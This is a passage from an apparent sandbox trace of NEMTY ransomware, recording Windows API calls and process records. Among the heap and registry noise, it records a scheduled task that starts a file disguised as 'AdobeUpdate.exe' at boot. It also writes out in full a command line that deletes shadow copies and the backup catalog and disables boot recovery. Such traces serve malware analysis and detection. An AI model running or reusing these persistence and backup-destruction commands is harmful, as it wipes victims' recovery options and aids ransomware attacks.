lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ef14c*="Desktop") returned 0x25 [0069.318] SetErrorMode (uMode=0x0) returned 0x1 [0069.318] GetProcessHeap () returned 0x4d0000 [0069.318] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d07f0, Size=0x6e) returned 0x4d07f0 [0069.318] GetProcessHeap () returned 0x4d0000 [0069.318] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d07f0) returned 0x6e [0069.318] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.318] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.318] GetProcessHeap () returned 0x4d0000 [0069.318] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x120) returned 0x4d0868 [0069.318] GetProcessHeap () returned 0x4d0000 [0069.318] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x238) returned 0x4d0990 [0069.324] GetProcessHeap () returned 0x4d0000 [0069.324] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4d0990, Size=0x122) returned 0x4d0990 [0069.324] GetProcessHeap () returned 0x4d0000 [0069.324] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4d0990) returned 0x122 [0069.324] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.324] GetProcessHeap () returned 0x4d0000 [0069.324] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xe0) returned 0x4e35d0 [0069.324] GetProcessHeap () returned 0x4d0000 [0069.324] RtlReAllocateHeap (Heap=0x4d0000, Flags=0x0, Ptr=0x4e35d0, Size=0x76) returned 0x4e35d0 [0069.324] GetProcessHeap () returned 0x4d0000 [0069.324] RtlSizeHeap (HeapHandle=0x4d0000, Flags=0x0, MemoryPointer=0x4e35d0) returned 0x76 [0069.325] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.325] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.exe", fInfoLevelId=0x1, lpFindFileData=0x3eeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eeee8) returned 0xffffffff [0069.325] GetLastError () returned 0x2 [0069.325] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.exe.*", fInfoLevelId=0x1, lpFindFileData=0x3eeec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eeec8) returned 0xffffffff [0069.325] GetLastError () returned 0x2 [0069.325] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\schtasks.exe", fInfoLevelId=0x1, lpFindFileData=0x3eeec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eeec8) returned 0xffffffff [0069.325] GetLastError () returned 0x2 [0069.325] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.325] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.exe", fInfoLevelId=0x1, lpFindFileData=0x3eeee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3eeee8) returned 0x4e3650 [0069.325] GetProcessHeap () returned 0x4d0000 [0069.325] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x14) returned 0x4e3690 [0069.326] FindClose (in: hFindFile=0x4e3650 | out: hFindFile=0x4e3650) returned 1 [0069.326] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0069.326] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0069.326] GetConsoleTitleW (in: lpConsoleTitle=0x3ef3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.326] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ef248, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ef310 | out: lpAttributeList=0x3ef248, lpSize=0x3ef310) returned 1 [0069.326] UpdateProcThreadAttribute (in: lpAttributeList=0x3ef248, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ef308, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ef248, lpPreviousValue=0x0) returned 1 [0069.326] GetStartupInfoW (in: lpStartupInfo=0x3ef204 | out: lpStartupInfo=0x3ef204*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.326] GetProcessHeap () returned 0x4d0000 [0069.326] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0x18) returned 0x4e3650 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.326] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.327] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.327] GetProcessHeap () returned 0x4d0000 [0069.327] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e3650 | out: hHeap=0x4d0000) returned 1 [0069.327] GetProcessHeap () returned 0x4d0000 [0069.327] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xa) returned 0x4e0008 [0069.327] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.328] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3ef2a4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3ef2f0 | out: lpCommandLine="schtasks.exe /create /sc onstart /tn \"_NEMTY_5Y4CYS9_\" /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AdobeUpdate.exe\"", lpProcessInformation=0x3ef2f0*(hProcess=0x78, hThread=0x74, dwProcessId=0x9e0, dwThreadId=0xa2c)) returned 1 [0069.335] CloseHandle (hObject=0x74) returned 1 [0069.335] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0069.335] GetProcessHeap () returned 0x4d0000 [0069.335] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e5fe8 | out: hHeap=0x4d0000) returned 1 [0069.335] GetEnvironmentStringsW () returned 0x4e5fe8* [0069.335] GetProcessHeap () returned 0x4d0000 [0069.335] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb36) returned 0x4e41c8 [0069.335] FreeEnvironmentStringsW (penv=0x4e5fe8) returned 1 [0069.335] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0073.780] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ef1e4 | out: lpExitCode=0x3ef1e4*=0x0) returned 1 [0073.781] CloseHandle (hObject=0x78) returned 1 [0073.781] _vsnwprintf (in: _Buffer=0x3ef32c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ef1f0 | out: _Buffer="00000000") returned 8 [0073.781] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0073.781] GetProcessHeap () returned 0x4d0000 [0073.781] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e41c8 | out: hHeap=0x4d0000) returned 1 [0073.781] GetEnvironmentStringsW () returned 0x4e41c8* [0073.782] GetProcessHeap () returned 0x4d0000 [0073.782] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb5c) returned 0x4e9690 [0073.782] FreeEnvironmentStringsW (penv=0x4e41c8) returned 1 [0073.782] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0073.782] GetProcessHeap () returned 0x4d0000 [0073.782] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e9690 | out: hHeap=0x4d0000) returned 1 [0073.782] GetEnvironmentStringsW () returned 0x4e41c8* [0073.782] GetProcessHeap () returned 0x4d0000 [0073.782] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x8, Size=0xb5c) returned 0x4e9690 [0073.782] FreeEnvironmentStringsW (penv=0x4e41c8) returned 1 [0073.782] GetProcessHeap () returned 0x4d0000 [0073.782] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x4e0008 | out: hHeap=0x4d0000) returned 1 [0073.782] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ef248 | out: lpAttributeList=0x3ef248) [0073.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.782] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0073.782] _get_osfhandle (_FileHandle=1) returned 0x7 [0073.782] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0073.782] _get_osfhandle (_FileHandle=0) returned 0x3 [0073.782] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0073.783] SetConsoleInputExeNameW () returned 0x1 [0073.783] GetConsoleOutputCP () returned 0x1b5 [0073.783] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0073.783] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.783] exit (_Code=0) Process: id = "42" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7b7c9000" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 164 os_tid = 0xbc0 [0069.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fa88 | out: lpSystemTimeAsFileTime=0x36fa88*(dwLowDateTime=0x9823c410, dwHighDateTime=0x1d57b18)) [0069.277] GetCurrentProcessId () returned 0xbdc [0069.277] GetCurrentThreadId () returned 0xbc0 [0069.277] GetTickCount () returned 0x114b490 [0069.277] QueryPerformanceCounter (in: lpPerformanceCount=0x36fa80 | out: lpPerformanceCount=0x36fa80*=18949813196) returned 1 [0069.278] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.278] __set_app_type (_Type=0x1) [0069.278] __p__fmode () returned 0x74eb31f4 [0069.278] __p__commode () returned 0x74eb31fc [0069.278] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.278] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.278] GetCurrentThreadId () returned 0xbc0 [0069.278] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbc0) returned 0x60 [0069.278] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.278] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.278] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.279] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.279] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x36fa18 | out: phkResult=0x36fa18*=0x0) returned 0x2 [0069.279] VirtualQuery (in: lpAddress=0x36fa4f, lpBuffer=0x36f9e8, dwLength=0x1c | out: lpBuffer=0x36f9e8*(BaseAddress=0x36f000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.279] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x36f9e8, dwLength=0x1c | out: lpBuffer=0x36f9e8*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.279] VirtualQuery (in: lpAddress=0x271000, lpBuffer=0x36f9e8, dwLength=0x1c | out: lpBuffer=0x36f9e8*(BaseAddress=0x271000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.279] VirtualQuery (in: lpAddress=0x273000, lpBuffer=0x36f9e8, dwLength=0x1c | out: lpBuffer=0x36f9e8*(BaseAddress=0x273000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.279] VirtualQuery (in: lpAddress=0x370000, lpBuffer=0x36f9e8, dwLength=0x1c | out: lpBuffer=0x36f9e8*(BaseAddress=0x370000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0069.279] GetConsoleOutputCP () returned 0x1b5 [0069.279] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.279] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.279] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.279] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.280] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.280] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.280] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.280] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.280] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.280] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0069.280] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.280] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0069.281] GetEnvironmentStringsW () returned 0x472248* [0069.281] GetProcessHeap () returned 0x460000 [0069.281] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x472d20 [0069.281] FreeEnvironmentStringsW (penv=0x472248) returned 1 [0069.281] GetProcessHeap () returned 0x460000 [0069.281] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x4) returned 0x46ec48 [0069.281] GetEnvironmentStringsW () returned 0x472248* [0069.281] GetProcessHeap () returned 0x460000 [0069.281] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xaca) returned 0x4737f8 [0069.281] FreeEnvironmentStringsW (penv=0x472248) returned 1 [0069.281] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36e988 | out: phkResult=0x36e988*=0x68) returned 0x0 [0069.281] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x0, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.281] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x1, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.281] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x1, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.281] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x0, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.281] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x40, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x40, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x40, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.282] RegCloseKey (hKey=0x68) returned 0x0 [0069.282] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36e988 | out: phkResult=0x36e988*=0x68) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x40, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x1, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x1, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x0, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x9, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x4, lpData=0x36e994*=0x9, lpcbData=0x36e98c*=0x4) returned 0x0 [0069.282] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36e990, lpData=0x36e994, lpcbData=0x36e98c*=0x1000 | out: lpType=0x36e990*=0x0, lpData=0x36e994*=0x9, lpcbData=0x36e98c*=0x1000) returned 0x2 [0069.282] RegCloseKey (hKey=0x68) returned 0x0 [0069.282] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebb3 [0069.282] srand (_Seed=0x5d97ebb3) [0069.282] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" [0069.282] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin.exe delete shadows /all /quiet & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete" [0069.282] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.283] GetProcessHeap () returned 0x460000 [0069.283] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472248 [0069.283] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x472250, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0069.283] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.283] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.283] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.283] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0069.283] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0069.283] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0069.283] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0069.283] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0069.283] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0069.283] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0069.283] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0069.283] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0069.283] GetProcessHeap () returned 0x460000 [0069.283] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472d20 | out: hHeap=0x460000) returned 1 [0069.283] GetEnvironmentStringsW () returned 0x472460* [0069.283] GetProcessHeap () returned 0x460000 [0069.283] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xae2) returned 0x474dc0 [0069.284] FreeEnvironmentStringsW (penv=0x472460) returned 1 [0069.284] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0069.284] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0069.284] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0069.284] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0069.284] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0069.284] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0069.284] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0069.284] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0069.284] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0069.284] _wcsicmp 